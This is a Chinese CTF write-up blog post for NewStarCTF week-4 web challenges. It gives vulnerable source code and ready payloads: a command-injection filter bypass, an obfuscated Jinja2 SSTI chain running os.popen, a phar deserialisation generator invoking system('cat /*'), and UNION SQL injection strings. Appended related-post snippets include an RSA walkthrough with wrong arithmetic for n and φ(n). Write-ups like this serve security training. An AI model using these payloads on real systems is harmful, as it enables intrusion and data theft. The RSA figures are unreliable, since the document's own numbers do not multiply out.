# NewStarCTF 公开赛赛道 WEEK4

最新推荐文章于 2024-07-20 13:29:02 发布
最新推荐文章于 2024-07-20 13:29:02 发布
阅读量1.3k 收藏 2
点赞数
分类专栏: Write Up 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Little_jcak/article/details/127362879
版权

Web题

RCE

源码:

<?php
error_reporting(0);
if(isset($_GET["cmd"])){
    if(preg_match('/et|echo|cat|tac|base|sh|more|less|tail|vi|head|nl|env|fl|\||;|\^|\'|\]|"|<|>|`|\/| |\\\\|\*/i',$_GET["cmd"])){
       echo "Don't Hack Me";
    }else{
        system($_GET["cmd"]);
    }
}else{
    show_source(__FILE__);
}

payload:

cmd=cd%09..%26%26cd%09..%26%26cd%09..%26%26c$2at%09ffff?lllaaaaggggg

BabySSTI_Two

源码:

from flask import Flask, request
from jinja2 import Template
import re
app = Flask(__name__)

@app.route("/")
def index():
    name = request.args.get('name', 'CTFer')
    if not re.findall('class|init|mro|subclasses|flag|cat|env|"|eval|system|popen|globals|builtins|\+| |attr|\~', name):
        t = Template("<body bgcolor=#6B6882><br><p><b><font color='white' size=6px><center>Welcome to NewStarCTF Again, Dear " + name + "</font></center></b></p><br><hr><br><font color='white' size=6px><center>Try to GET me a NAME</center></font><!--This is Hint: Waf Has Been Updated, More Safe!--></body>")
        return t.render()
    else:
        t = Template("Get Out!Hacker!")
        return t.render()
if __name__ == "__main__":
    app.run()

payload:

?name={{[]['\x5f\x5fc\x6cass\x5f\x5f']['\x5f\x5fbase\x5f\x5f']['\x5f\x5fsubc\x6casses\x5f\x5f']()[199]['\x5f\x5f\x69nit\x5f\x5f']['\x5f\x5fg\x6cobals\x5f\x5f']['\x5f\x5fbu\x69ltins\x5f\x5f']['\x5f\x5fimport\x5f\x5f']('os')['p\x6fpen']('tac%09/f*').read()}}

UnserializeThree

文件上传+phar反序列化

源码:

class.php

<?php
highlight_file(__FILE__);
class Evil{
    public $cmd;
    public function __destruct()
    {
        if(!preg_match("/>|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){
            //Same point ,can you bypass me again?
            eval("#".$this->cmd);
        }else{
            echo "No!";
        }
    }
}

file_exists($_GET['file']);

payload:

phar.php => phar.png

class Evil{
    public $cmd;
    public function __construct($cmd)
    {
        $this->cmd = $cmd;
    }
}
$phar = new Phar("phar.phar");//生成后缀名为phar的文件,后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>");
$cmd = urldecode("%0D")."system('cat /*');";
$o = new Evil($cmd);
$phar->setMetadata($o);//将自定义的meta-data存入mainfest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
$phar->stopBuffering();
rename("phar.phar","phar1.png");

触发:

/class.php?file=phar://upload/20d230fcef0fa22a2f771da029c4b9fc.png

又一个SQL

绕过空格:%0b

payload:

#爆表名
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(table_name)%0bfrom%0binformation_schema.tables%0bwhere%0btable_schema=database()),2; 
#爆列名
name=-1%0bunion%0bselect%0b(select%0bgroup_concat(column_name)%0bfrom%0binformation_schema.columns%0bwhere%0btable_name='wfy_comments'),2;
# 爆字段
-1%0bunion%0bselect%0b(select%0bgroup_concat(id,text,user,name,display)%0bfrom%0bwfy_comments%0blimit%0b0,1),2;

Rome

简单的反序列化题,用ysoseiral生成下payload就能打

源码(用jadx反编译的):

package remo.remo;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.util.Base64;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;

@Controller
/* loaded from: Remo-0.0.1-SNAPSHOT.jar:BOOT-INF/classes/remo/remo/SerController.class */
public class SerController {
    @GetMapping({"/"})
    @ResponseBody
    public String helloCTF() {
        return "Do you like Jvav?";
    }

    @PostMapping({"/"})
    @ResponseBody
    public String helloCTF(@RequestParam String EXP) throws IOException, ClassNotFoundException {
        if (EXP.equals("")) {
            return "Do you know Rome Serializer?";
        }
        byte[] exp = Base64.getDecoder().decode(EXP);
        ByteArrayInputStream bytes = new ByteArrayInputStream(exp);
        ObjectInputStream objectInputStream = new ObjectInputStream(bytes);
        objectInputStream.readObject();
        return "Do You like Jvav?";
    }
}

payload注意用url编码将base64编码后的特殊字符编码

NewStarCTF 公开赛赛道
shinygod的博客
10-06 2208
基础练习
[NewStarCTF 公开赛赛道]ret2text 94
2302_81899310的博客
07-31 310
在main函数打个断点进行动态分析发现共需填入0x20个字符型数据,且还需填写8个数据将原来末尾的数据覆盖,然后将main函数的返回地址写为后门函数的地址,写出攻击脚本。根据题目ret2text的提示,我们可以构造payload,在栈内填充垃圾数据,从而使得main函数的返回地址为后门函数的地址,进而拿取到机器的控制权,获取flag.利用pwndbg进行动态分析时发现没有执行权限,所以我们要利用chmod命令加权。确实是后门函数,并且有函数存在栈溢出的漏洞。发现一个后门函数,点进去确认一下。
[wp]NewStarCTF 2023 WEEK4|WEB
m0_63138919的博客
10-23 1332
本文为[wp]NewStarCTF 2023 WEEK4|WEB 的解题思路
[BUUCTF NewStarCTF 2023 公开赛道] week4 crypto/pwn
weixin_52640415的博客
10-30 1302
Schmidt-Samoa密码系统, NTRU, smart攻击,p-1光滑分解,B=A*x+e 含误差用格求解, double,off_by_one,
NewStarCTF2022-Week4-Web
bossDDYY的博客
10-18 1264
**写在前面**:本人小白,文章有什么错误,欢迎各位师傅指点 本文有些地方借鉴Pysnow师傅的wp[Pysnow师傅的wp](https://pysnow.cn/archives/453/) # So Baby RCE > 考点:空格绕过、关键字符绕过、斜杠绕过 ## 分析 打开题目,发现直接给的源码 ```php
NewStar CTF Week3Misc 4-5Web
weixin_63231007的博客
12-05 1473
目录 Week-3 Misc(1) Whats HTTP(2) qsdz's girlfriend 3(3) WebShell!(4) 混沌的图像 Week-4 Web(1) So Baby RCE(%0A进行rce rev|sort读取flag)(2) UnserializeThree(%0d换行rce) week5-web(1) Give me your photo PLZ(.htaccess配置文件漏洞)(2) Unsafe Apache(CVE-2021-42013)(3) So
NewStarCTF 2024 公开赛Week1
2401_85238540的博客
07-20 1936
使用风二西(风大)的轩禹RSA工具分解模数N,然后计算私钥,计算明文,明文转字符即可获得flag。
NewStarCTF 2023 公开赛Week1
2401_84519960的博客
05-17 577
然后导出HTTP对象文件直接全部开导,保存到一个文件夹里然后发现了这个有点像flag的文件名打开之后发现是一串base加密后的密文,那么将它解密即可,是两层base64
[NewStarCTF 公开赛赛道]Baby_Re WP
xbean1028的博客
02-06 433
其实挺简单一个题,因为没搜到题解,索性就写一个,不难,还挺有意思的,记录思路。FunctionName这个函数把原始数组改了四个值。根据main函数,显然就是数组异或就出结果。,看提示和这个显示,应该还有信息。没有壳,直接IDA打开看。写个脚本soeasy。改过来,出结果,OK。
NewStarCtf 2023 week3&week4&week5 web部分题目复现
m0_73973498的博客
11-19 1723
看到源码中给出提示,包含phpinfo.php文件,包含后显示了phpinfo,搜索flag发现结合文件包含和题目的提示,无疑就是利用pearcmd.php本地文件包含(LFI)。关于pearcmd.php的介绍和利用直接放链接了大概意思就是我们可以利用pear中的命令,命令的参数来自于我们的url栏,用+分隔,因此是可控的,但是前提是register_argc_argv需要开启,且需要包含/usr/local/lib/php/pearcmd.php.
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
末初 · mochu7
10-16 4090
BUUCTF NewStarCTF 公开赛赛道Week4 Writeup
【Web】NewStarCTF Week4 个人复现
uuzeray的博客
11-30 639
所以只需要上传一个能rce的app.py文件把原来的覆盖,就可以了。得到O:7:"GetFlag":2:{s:3:"key";s:3:"cmd";s:4:"ls /";得到secret_key = "y0u_n3ver_k0nw_s3cret_key_1s_newst4r"(修改序列化元素个数,可以快速触发desrtuct,可以绕过throw异常)(删去最后一个括号,可以快速触发desrtuct,可以绕过throw异常)s:4:"ls /";过滤了空格,其他没有过滤,页面没有回显,时间盲注。
NewStarCTF pwn
iczfy585的博客
10-21 1225
NewStarCTF中pwn的一些wp
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|MISC
zerorzeror的博客
10-16 1960
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|MISC
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|CRYPTO
zerorzeror的博客
10-17 668
2022 七校联合NewStarCTF 公开赛赛道 WEEK4|CRYPTO
[NewStarCTF 2023 公开赛道]Unserialize
qq_20242529的博客
04-29 549
PHP 序列化的时候 private和 protected 变量会引入不可见字符%00,private是%00类名%00属性名 ,protected为%00*%00属性名 ,注意这两个 %00就是 ascii 码0的字符。$cmd 是 private 属性的,赋值只能在内部赋值。浏览器输出的结果:O:4:"evil":1:{s:9:"evilcmd";要改为O:4:"evil":1:{s:9:"%00evil%00cmd";就是说上面的O:4:"evil":1:{s:9:"evilcmd";
NewStarCTF 公开赛赛道week2 web writeup
your_friends的博客
10-02 861
利用mt_srand是伪随机数用它给出的Hint到php_mt_seed里面直接跑。如果我们post提交了一个data那么他就不会执行后面的文件从而执行我们自己的输入。由Easy::__call方法进入eeee::__clone。进入__invoke需要调用到Start::__isset。上周做题被这道sql注入整感动了,这次增加难度又来了。由Sec::__tostring进入__call方法。最终调用点在Sec::__invoke。发现我们直接在页面查询是输入了一个id。虽然加了点难度,但是还是挺简单。
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
末初 · mochu7
10-03 1857
BUUCTF NewStarCTF 公开赛赛道Week1 Writeup
[NewStarCTF 公开赛赛道]RSA_begin
最新发布
03-16
### 关于 NewStarCTF 公开赛 RSA_begin 的解题思路 #### 背景介绍 RSA 是一种基于大整数分解困难性的公钥加密算法。其核心在于通过两个大素数 \( p \) 和 \( q \),计算模数 \( n = p \times q \),并利用欧拉函数 \( \phi(n) = (p-1)(q-1) \) 来生成私钥 \( d \)[^1]。 在题目中已知参数如下: - \( p = 473398607161 \) - \( q = 4511491 \) - \( e = 17 \) 目标是求解私钥 \( d \),满足条件 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。 --- #### 计算过程详解 ##### 1. 计算模数 \( n \) 根据定义,\( n = p \times q \)。因此, \[ n = 473398607161 \times 4511491 = 2136002117282111. \] ##### 2. 计算欧拉函数 \( \phi(n) \) 由公式 \( \phi(n) = (p-1)(q-1) \),可得: \[ \phi(n) = (473398607161 - 1) \times (4511491 - 1) = 473398607160 \times 4511490 = 2135550968666920. \] ##### 3. 扩展欧几里得算法求逆元 \( d \) 为了找到 \( d \),需满足 \( e \cdot d \equiv 1 \ (\text{mod} \ \phi(n)) \)。这可以通过扩展欧几里得算法实现: 给定 \( a = e = 17 \), \( b = \phi(n) = 2135550968666920 \),执行扩展欧几里得算法得到 \( x \)(即 \( d \)),使得 \( ax + by = \gcd(a, b) \) 成立。 以下是 Python 实现代码: ```python def egcd(a, b): if a == 0: return (b, 0, 1) gcd, x1, y1 = egcd(b % a, a) x = y1 - (b // a) * x1 y = x1 return gcd, x, y def mod_inverse(e, phi_n): _, x, _ = egcd(e, phi_n) return x % phi_n # 已知参数 e = 17 phi_n = 2135550968666920 # 求解 d d = mod_inverse(e, phi_n) print(d) ``` 运行上述代码可以得出结果: \[ d = 125714762862169. \] --- #### 提交 Flag 最终将 \( d \) 值作为 flag 提交即可。 --- ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值